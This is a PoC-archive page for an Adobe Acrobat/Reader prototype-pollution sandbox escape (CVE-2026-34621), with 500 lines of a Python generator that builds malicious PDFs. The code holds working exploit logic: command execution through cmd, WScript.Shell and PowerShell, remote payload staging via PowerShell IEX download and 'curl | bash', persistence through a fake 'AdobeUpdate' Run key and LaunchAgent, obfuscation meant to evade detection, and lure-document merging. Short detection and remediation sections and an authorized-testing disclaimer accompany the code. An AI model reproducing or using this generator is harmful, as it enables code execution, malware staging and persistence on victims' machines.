PoC Archive PoC Archive
Critical CVE-2026-34621 unpatched

Adobe Acrobat/Reader Prototype Pollution Sandbox Escape (CVE-2026-34621)

by NULL200OK · 2026-05-16

CVSS 9.8/10
Severity
Critical
CVE
CVE-2026-34621
Category
binary
Affected product
Adobe Acrobat DC / Adobe Acrobat Reader DC / Adobe Acrobat 2024 JavaScript engine sandbox boundary
Affected versions
Acrobat/Reader DC Continuous ≤ 26.001.21367; Acrobat 2024 Classic ≤ 24.001.30356
Disclosed
2026-05-16
Patch status
unpatched

Metadata

FieldValue
Date Added2026-05-16
Author / ResearcherNULL200OK
CVE / AdvisoryCVE-2026-34621
Categorybinary
SeverityCritical
CVSS Score9.8 (estimated, CVSSv3)
StatusWeaponized
Tagsprototype-pollution, sandbox-escape, Adobe-Acrobat, Adobe-Reader, PDF, RCE, Windows, macOS, user-interaction
RelatedN/A

Affected Target

FieldValue
Software / SystemAdobe Acrobat DC / Adobe Acrobat Reader DC / Adobe Acrobat 2024 JavaScript engine sandbox boundary
Versions AffectedAcrobat/Reader DC Continuous ≤ 26.001.21367; Acrobat 2024 Classic ≤ 24.001.30356
Language / PlatformPython PoC generator targeting Adobe PDF JavaScript on Windows and macOS
Authentication RequiredPartial (victim must open crafted PDF)
Network Access RequiredNo (optional staging URL supported by PoC)

Summary

This repository contains a Python-based exploit generator for CVE-2026-34621, described as a prototype pollution vulnerability in Adobe Acrobat and Reader that can break JavaScript trust boundaries. The generated PDF embeds JavaScript intended to escalate from untrusted document context to privileged API access, then execute OS commands on vulnerable hosts. The PoC supports multiple trigger vectors, obfuscation levels, and payload staging for authorized lab validation on Windows and macOS.


Vulnerability Details

Root Cause

The upstream write-up states that attacker-controlled JavaScript can pollute Object.prototype and inject trusted-like properties into Adobe’s JavaScript runtime object graph. This weakens separation between untrusted document script and privileged execution context.

Attack Vector

An attacker sends a crafted PDF to a target user. When the file is opened in a vulnerable Adobe Acrobat/Reader build with JavaScript enabled, the embedded script executes, attempts context escalation through polluted prototype state, and invokes privileged APIs to launch attacker-specified commands.

Impact

Successful exploitation can produce sandbox escape and arbitrary code execution in the victim environment, with practical impact ranging from local command execution to staged payload download and persistence.


Environment / Lab Setup

OS:          Windows and/or macOS test hosts
Target:      Adobe Acrobat/Reader vulnerable versions listed above
Attacker:    Authorized security tester
Tools:       Python 3.7+, optional PyPDF2 for lure-PDF merging

Setup Steps

1
python3 cve_2026_34621_advanced.py -o test.pdf

Proof of Concept

Step-by-Step Reproduction

  1. Generate crafted PDF with default benign demo commands.

    1
    
    python3 cve_2026_34621_advanced.py -o invoice.pdf
    
  2. Optionally tune payload and trigger for platform-specific testing.

    1
    
    python3 cve_2026_34621_advanced.py -o targeted.pdf --win calc.exe --trigger openaction
    
  3. Open the PDF in vulnerable Adobe build inside an authorized sandboxed test VM.

Exploit Code

See cve_2026_34621_advanced.py in this folder.

1
2
3
4
5
6
7
import subprocess

subprocess.run([
    "python3", "cve_2026_34621_advanced.py",
    "-o", "test.pdf",
    "--win", "calc.exe",
])

Expected Output

[+] Output PDF: test.pdf
[+] Generated report files: test_report.html / test_report.txt / test_config.json

Screenshots / Evidence

  • screenshots/ — add authorized lab screenshots of Adobe version, PDF open event, and observed command execution behavior.

Detection & Indicators of Compromise

- Unexpected Adobe Reader/Acrobat child process creation (cmd.exe, powershell.exe, osascript)
- Suspicious Acrobat JavaScript API usage patterns in opened PDFs
- Unknown PDF files triggering process execution shortly after user open

SIEM / IDS Rule (example):

Detect process chain: AcroRd32.exe or Acrobat.exe -> command interpreter / script host
with command-line anomalies and preceding untrusted PDF open events.

Remediation

ActionDetail
PatchUpdate Adobe Acrobat/Reader to patched builds (DC 26.001.21411+; Acrobat 2024 24.001.30362+ on Windows / 24.001.30360+ on macOS per upstream write-up)
WorkaroundDisable Acrobat JavaScript where business impact allows; block untrusted PDF execution paths
Config HardeningEnforce EDR child-process restrictions for PDF readers and isolate document-handling workflows

References


Notes

Auto-ingested from https://github.com/NULL200OK/cve_2026_34621_advanced on 2026-05-16.

Upstream repository states the tool is for authorized testing only; validate only in isolated lab environments.

cve_2026_34621_advanced.py
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
#!/usr/bin/env python3
"""
CVE-2026-34621 - Advanced Cross-Platform Exploit Generator
===========================================================
Generates a malicious PDF that exploits Adobe Acrobat/Reader
prototype pollution + sandbox escape vulnerability.

Features:
- OS auto-detection (Windows, macOS, mobile fallback)
- Multiple evasion techniques (obfuscation, keying, delays)
- Staged payloads and fileless execution
- Persistence installation
- Lure PDF merging
- Multiple trigger vectors
- Comprehensive reporting

FOR AUTHORIZED SECURITY TESTING ONLY.
"""

import argparse
import base64
import json
import os
import random
import re
import string
import sys
import time
from datetime import datetime
from html import escape as html_escape
from textwrap import dedent

print("""

███╗░░██╗██╗░░░██╗██╗░░░░░██╗░░░░░██████╗░░█████╗░░█████╗░  ░█████╗░██╗░░██╗
████╗░██║██║░░░██║██║░░░░░██║░░░░░╚════██╗██╔══██╗██╔══██╗  ██╔══██╗██║░██╔╝
██╔██╗██║██║░░░██║██║░░░░░██║░░░░░░░███╔═╝██║░░██║██║░░██║  ██║░░██║█████═╝░
██║╚████║██║░░░██║██║░░░░░██║░░░░░██╔══╝░░██║░░██║██║░░██║  ██║░░██║██╔═██╗░
██║░╚███║╚██████╔╝███████╗███████╗███████╗╚█████╔╝╚█████╔╝  ╚█████╔╝██║░╚██╗
╚═╝░░╚══╝░╚═════╝░╚══════╝╚══════╝╚══════╝░╚════╝░░╚════╝░  ░╚════╝░╚═╝░░╚═╝
                NULL200OK 💀🔥created by NABEEL 🔥💀
CVE-2026-34621 - Advanced Cross-Platform Exploit Generator
===========================================================
Generates a malicious PDF that exploits Adobe Acrobat/Reader
prototype pollution + sandbox escape vulnerability.

Features:
- OS auto-detection (Windows, macOS, mobile fallback)
- Multiple evasion techniques (obfuscation, keying, delays)
- Staged payloads and fileless execution
- Persistence installation
- Lure PDF merging
- Multiple trigger vectors
- Comprehensive reporting

FOR AUTHORIZED SECURITY TESTING ONLY.

""")

try:
    from PyPDF2 import PdfReader, PdfWriter
    PYPDF2_AVAILABLE = True
except ImportError:
    PYPDF2_AVAILABLE = False
    print("[!] PyPDF2 not installed. Lure PDF merging will be disabled.", file=sys.stderr)

# ============================================================================
# 1. UTILITIES
# ============================================================================

class RandomUtils:
    """Random generation helpers for polymorphism."""
    
    @staticmethod
    def random_string(length=8, chars=None):
        """Generate a random alphanumeric string."""
        if chars is None:
            chars = string.ascii_letters + string.digits
        return ''.join(random.choices(chars, k=length))
    
    @staticmethod
    def random_var_name():
        """Generate a random JavaScript variable name."""
        return '_' + RandomUtils.random_string(random.randint(6, 12), string.ascii_lowercase)
    
    @staticmethod
    def random_comment():
        """Generate a random junk comment."""
        comments = [
            "/* performance optimization */",
            "/* debug: " + RandomUtils.random_string(20) + " */",
            "// TODO: refactor",
            "// FIXME: " + RandomUtils.random_string(10),
            "/* " + RandomUtils.random_string(30) + " */",
        ]
        return random.choice(comments)


# ============================================================================
# 2. JAVASCRIPT OBFUSCATOR (Polymorphic, Multi-Level)
# ============================================================================

class JavaScriptObfuscator:
    """
    Apply obfuscation to JavaScript payload.
    Supports multiple levels and polymorphic generation.
    """
    
    def __init__(self, seed=None):
        if seed:
            random.seed(seed)
    
    def obfuscate(self, js_code, level=1, polymorphic=True):
        """
        Obfuscate JavaScript code.
        level: 1 (basic), 2 (intermediate), 3 (advanced)
        polymorphic: if True, uses random elements each run
        """
        if level == 0:
            return js_code
        
        # Level 1: String to char code, variable renaming
        if level >= 1:
            js_code = self._string_to_charcode(js_code)
            if polymorphic:
                js_code = self._rename_variables(js_code)
        
        # Level 2: Dead code injection, comment spam
        if level >= 2:
            js_code = self._inject_dead_code(js_code)
            js_code = self._add_junk_comments(js_code)
        
        # Level 3: Base64 encoding with eval wrapper
        if level >= 3:
            js_code = self._base64_wrap(js_code)
            js_code = self.obfuscate(js_code, level=2, polymorphic=False)  # double obfuscate
        
        return js_code
    
    def _string_to_charcode(self, js_code):
        """Convert string literals to String.fromCharCode() calls."""
        def replacer(match):
            s = match.group(1)
            if len(s) < 3:  # skip short strings
                return match.group(0)
            codes = ','.join(str(ord(c)) for c in s)
            return f'String.fromCharCode({codes})'
        
        # Match double-quoted strings (simple, not perfect but effective)
        pattern = r'"([^"\\]*(\\.[^"\\]*)*)"'
        return re.sub(pattern, replacer, js_code)
    
    def _rename_variables(self, js_code):
        """Replace variable names with random ones."""
        var_pattern = r'\b(var|let|const)\s+([a-zA-Z_$][a-zA-Z0-9_$]*)'
        func_pattern = r'\bfunction\s+([a-zA-Z_$][a-zA-Z0-9_$]*)'
        
        var_names = set(re.findall(var_pattern, js_code))
        func_names = set(re.findall(func_pattern, js_code))
        
        all_names = set()
        for _, name in var_names:
            all_names.add(name)
        all_names.update(func_names)
        
        # Create mapping
        mapping = {}
        for name in all_names:
            if name not in ['app', 'util', 'console', 'Object', 'Array', 'Function',
                            'String', 'ActiveXObject', 'navigator', 'setTimeout',
                            'setInterval', 'eval', 'atob', 'btoa']:
                mapping[name] = self.random_var_name()
        
        # Replace
        for old, new in mapping.items():
            js_code = re.sub(rf'\b{old}\b', new, js_code)
        
        return js_code
    
    def _inject_dead_code(self, js_code):
        """Insert dead code blocks that never execute."""
        dead_blocks = [
            "if(false) { console.log('" + RandomUtils.random_string(10) + "'); }",
            "while(false) { break; }",
            "try { null.toString(); } catch(e) {}",
            "switch(0) { case 1: break; default: break; }",
            "{ let x = '" + RandomUtils.random_string(8) + "'; }",
        ]
        
        lines = js_code.split('\n')
        new_lines = []
        for line in lines:
            new_lines.append(line)
            if random.random() < 0.3 and len(line.strip()) > 0:
                new_lines.append(random.choice(dead_blocks))
        
        return '\n'.join(new_lines)
    
    def _add_junk_comments(self, js_code):
        """Sprinkle random comments."""
        lines = js_code.split('\n')
        new_lines = []
        for line in lines:
            if random.random() < 0.4 and line.strip() and not line.strip().startswith('//'):
                line = random.choice(['// ', '/* ', '']) + RandomUtils.random_string(15) + random.choice([' */', '']) + '\n' + line
            new_lines.append(line)
        return '\n'.join(new_lines)
    
    def _base64_wrap(self, js_code):
        """Encode the entire script in base64 and eval it."""
        encoded = base64.b64encode(js_code.encode()).decode()
        wrapper = f'eval(atob("{encoded}"));'
        return wrapper
    
    @staticmethod
    def random_var_name():
        return '_' + ''.join(random.choices(string.ascii_lowercase, k=random.randint(8, 12)))


# ============================================================================
# 3. PAYLOAD GENERATOR (Cross-Platform, Staged, Persistent)
# ============================================================================

class PayloadGenerator:
    """
    Generate JavaScript payload with OS detection, staging, persistence.
    """
    
    def __init__(self, windows_cmd=None, mac_cmd=None, stage_url=None,
                 persistence=False, delay=0, env_key=None):
        self.windows_cmd = windows_cmd or "calc.exe"
        self.mac_cmd = mac_cmd or "open /System/Applications/Calculator.app"
        self.stage_url = stage_url
        self.persistence = persistence
        self.delay = delay
        self.env_key = env_key  # target hostname/username for keying
    
    def generate(self):
        """Generate the complete JavaScript payload."""
        # Build the core exploit logic
        core_js = self._build_core_exploit()
        
        # Apply environment keying if requested
        if self.env_key:
            core_js = self._apply_environment_keying(core_js)
        
        # Apply delay if requested
        if self.delay > 0:
            core_js = f"setTimeout(function() {{ {core_js} }}, {self.delay * 1000});"
        
        # Wrap in self-executing function with random name for polymorphism
        func_name = JavaScriptObfuscator.random_var_name()
        wrapped = f"""
        (function {func_name}() {{
            {core_js}
        }})();
        """
        return wrapped
    
    def _build_core_exploit(self):
        """Construct the core exploit code with OS branching."""
        
        # Build Windows payload section
        windows_payload = self._build_windows_payload()
        mac_payload = self._build_mac_payload()
        mobile_fallback = self._build_mobile_fallback()
        
        js = f"""
        // CVE-2026-34621 Cross-Platform Exploit
        // Generated: {datetime.now().isoformat()}
        
        // === Prototype Pollution (CVE-2026-34621) ===
        try {{
            Object.prototype.__defineGetter__('__trusted', function() {{ return true; }});
            Object.prototype.constructor.prototype.bypass = true;
            Object.prototype.__proto__.privileged = true;
            Array.prototype.__proto__.polluted = true;
        }} catch(e) {{}}
        
        // === OS Detection ===
        var os = 'unknown';
        try {{
            if (typeof app !== 'undefined' && app.platform) {{
                var pf = app.platform.toLowerCase();
                if (pf.indexOf('win') >= 0) os = 'windows';
                else if (pf.indexOf('mac') >= 0) os = 'macos';
            }}
            if (os === 'unknown' && typeof navigator !== 'undefined') {{
                var ua = navigator.userAgent.toLowerCase();
                if (ua.indexOf('windows') >= 0) os = 'windows';
                else if (ua.indexOf('mac') >= 0) os = 'macos';
                else if (ua.indexOf('android') >= 0) os = 'android';
                else if (ua.indexOf('iphone') >= 0 || ua.indexOf('ipad') >= 0) os = 'ios';
            }}
            // Adobe-specific mobile detection
            if (typeof app !== 'undefined' && app.viewerType) {{
                if (app.viewerType.toLowerCase().indexOf('mobile') >= 0) os = 'android'; // or ios
            }}
        }} catch(e) {{}}
        
        // === OS-Specific Execution ===
        try {{
            if (os === 'windows') {{
                {windows_payload}
            }} else if (os === 'macos') {{
                {mac_payload}
            }} else {{
                {mobile_fallback}
            }}
        }} catch(mainErr) {{}}
        
        // Additional trigger: attempt privileged file read to escalate context
        try {{
            if (typeof util !== 'undefined' && util.readFileIntoStream) {{
                var path = (os === 'windows') ? 'C:\\\\Windows\\\\win.ini' : '/etc/hosts';
                util.readFileIntoStream({{cDIPath: path, bEncodeBase64: true}});
            }}
        }} catch(e) {{}}
        """
        return js
    
    def _build_windows_payload(self):
        """Generate Windows-specific execution chain."""
        methods = []
        
        # Direct command via cmd
        cmd_escaped = self.windows_cmd.replace('\\', '\\\\').replace('"', '\\"')
        methods.append(f'''
        // Method 1: app.launchURL with cmd.exe
        try {{
            app.launchURL('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent("{cmd_escaped}"), true);
        }} catch(e1) {{}}
        ''')
        
        # WScript.Shell (older Windows)
        methods.append(f'''
        // Method 2: ActiveX WScript.Shell
        try {{
            var shell = new ActiveXObject('WScript.Shell');
            shell.Run("{cmd_escaped}", 0, false);
        }} catch(e2) {{}}
        ''')
        
        # PowerShell (modern, versatile)
        if self.stage_url:
            # Staged download via PowerShell
            ps_cmd = f"powershell -NoP -Ep Bypass -C \"IEX(New-Object Net.WebClient).DownloadString('{self.stage_url}')\""
            methods.append(f'''
            // Method 3: PowerShell staged download
            try {{
                var shell = new ActiveXObject('WScript.Shell');
                shell.Run("{ps_cmd}", 0, false);
            }} catch(e3) {{}}
            ''')
        else:
            # Direct PowerShell execution
            ps_cmd = f"powershell -Command \"{self.windows_cmd}\""
            methods.append(f'''
            // Method 3: PowerShell direct
            try {{
                var shell = new ActiveXObject('WScript.Shell');
                shell.Run("{ps_cmd}", 0, false);
            }} catch(e3) {{}}
            ''')
        
        # Persistence (if enabled)
        if self.persistence:
            persist_cmd = r'powershell -NoP -Ep Bypass -C "$p=\'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\'; Set-ItemProperty -Path $p -Name \'AdobeUpdate\' -Value \'%TEMP%\\updater.exe\'"'
            methods.append(f'''
            // Persistence: registry Run key
            try {{
                var shell = new ActiveXObject('WScript.Shell');
                shell.Run("{persist_cmd}", 0, false);
            }} catch(e_persist) {{}}
            ''')
        
        return '\n'.join(methods)
    
    def _build_mac_payload(self):
        """Generate macOS-specific execution chain."""
        methods = []
        
        # Escape for shell
        mac_cmd_escaped = self.mac_cmd.replace('\\', '\\\\').replace('"', '\\"')
        
        # Terminal.app via file:// URL
        methods.append(f'''
        // Method 1: Terminal via file://
        try {{
            app.launchURL('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent("{mac_cmd_escaped}"), true);
        }} catch(e1) {{}}
        ''')
        
        # osascript URL scheme
        methods.append(f'''
        // Method 2: osascript
        try {{
            var script = 'do shell script "' + "{mac_cmd_escaped}" + '"';
            app.launchURL('osascript://' + encodeURIComponent(script));
        }} catch(e2) {{}}
        ''')
        
        # Staged download via curl
        if self.stage_url:
            curl_cmd = f"curl -s {self.stage_url} | bash"
            methods.append(f'''
            // Method 3: curl pipe to bash
            try {{
                app.launchURL('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent("{curl_cmd}"), true);
            }} catch(e3) {{}}
            ''')
        
        # Persistence: LaunchAgent
        if self.persistence:
            plist = f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict><key>Label</key><string>com.adobe.update</string><key>ProgramArguments</key><array><string>/bin/bash</string><string>-c</string><string>{mac_cmd_escaped}</string></array><key>RunAtLoad</key><true/></dict></plist>"""
            plist_b64 = base64.b64encode(plist.encode()).decode()
            persist_cmd = f"echo '{plist_b64}' | base64 -d > ~/Library/LaunchAgents/com.adobe.update.plist && launchctl load ~/Library/LaunchAgents/com.adobe.update.plist"
            methods.append(f'''
            // Persistence: LaunchAgent
            try {{
                app.launchURL('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent("{persist_cmd}"), true);
            }} catch(e_persist) {{}}
            ''')
        
        return '\n'.join(methods)
    
    def _build_mobile_fallback(self):
        """Mobile demo behavior (since not vulnerable)."""
        return '''
        // Mobile platforms: demo fallback (not vulnerable)
        try {
            app.launchURL('https://www.example.com', true);
            app.alert('Demo: This PDF would exploit CVE-2026-34621 on desktop.');
        } catch(e) {}
        '''
    
    def _apply_environment_keying(self, js_code):
        """Wrap payload with hostname/username check."""
        key_check = f"""
        var targetKey = '{self.env_key}';
        var currentKey = '';
        try {{
            // Try to get hostname
            var shell = new ActiveXObject('WScript.Shell');
            currentKey = shell.ExpandEnvironmentStrings('%COMPUTERNAME%');
        }} catch(e) {{
            try {{
                currentKey = app.runtime.prefManager.getPref('hostname');
            }} catch(e2) {{
                try {{
                    var env = this.getEnvironment();
                    currentKey = env.COMPUTERNAME || env.HOSTNAME;
                }} catch(e3) {{}}
            }}
        }}
        if (currentKey.toUpperCase() === targetKey.toUpperCase()) {{
            {js_code}
        }}
        """
        return key_check


# ============================================================================
# 4. PDF GENERATOR (Pure Python, with Lure Merging)
# ============================================================================

class PDFGenerator:
    """Generate malicious PDF with embedded JavaScript."""
    
    def __init__(self):
        self.objects = []
    
    def build_pdf(self, js_code, lure_pdf_path=None, trigger_vector='openaction'):
        """
        Build PDF with JavaScript payload.
        trigger_vector: 'openaction', 'pageopen', 'doclevel'
        """
        if lure_pdf_path and PYPDF2_AVAILABLE:
            return self._merge_with_lure(lure_pdf_path, js_code, trigger_vector)
        else:
            return self._build_standalone_pdf(js_code, trigger_vector)
    
    def _build_standalone_pdf(self, js_code, trigger_vector):
        """Create a minimal PDF from scratch."""
        pdf = "%PDF-1.7\n%\xe2\xe3\xcf\xd3\n"
        
        # Object IDs
        catalog_id = 1
        pages_id = 2
        page_id = 3
        contents_id = 4
        js_action_id = 5
        js_script_id = 6
        names_id = 7
        doc_js_id = 8
        
        # JavaScript object
        js_obj = f"{js_script_id} 0 obj\n<< /JS {self._pdf_string(js_code)} /S /JavaScript >>\nendobj\n"
Showing 500 of 870 lines View full file on GitHub →